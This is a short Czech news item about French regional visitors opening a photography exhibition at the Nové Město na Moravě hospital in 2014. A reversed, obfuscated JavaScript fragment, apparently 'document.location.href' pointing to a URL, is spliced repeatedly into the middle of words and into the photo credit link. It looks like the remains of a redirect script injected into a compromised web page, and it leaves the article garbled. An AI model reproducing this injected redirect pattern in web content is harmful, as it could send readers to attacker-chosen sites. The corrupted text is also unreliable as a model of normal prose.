nemocnice, výstava
Rainbow page separator

Francouzská návštěva otevřela v nemocnici výstavu

Pondělí, 17. listopadu 2014

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V přízemí interního pavilonu novoměstské nemocnice je v současné době k vidění výstava fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií Kraje Vysočina, ale také Nitranského samosprávného kraje a francouzského kraje Champagne-Ardenne, což jsou partnerské regiony Kraje Vysočina. Výstava fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografických snímků byla zahájena za pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti návštěvníků z francouzské oblasti Champagne-Ardenne, kteří přijeli poznávat Vysočinu.
Francouzská výprava mimo návštěvy Jihlavy dorazila i na Žďársko, kde kromě nemocnice v Novém Městě zavítala do novoměstské společnosti Sporten a prohlédla si tamní Vysočina Arenu. Na závěr návštěvy si Francouzi nenechali ujít žďárský poutní kostel svatého Jana Nepomuckého na Zelené hoře – významnou památku zapsanou na seznamu svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového kulturního dědictví UNESCO.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com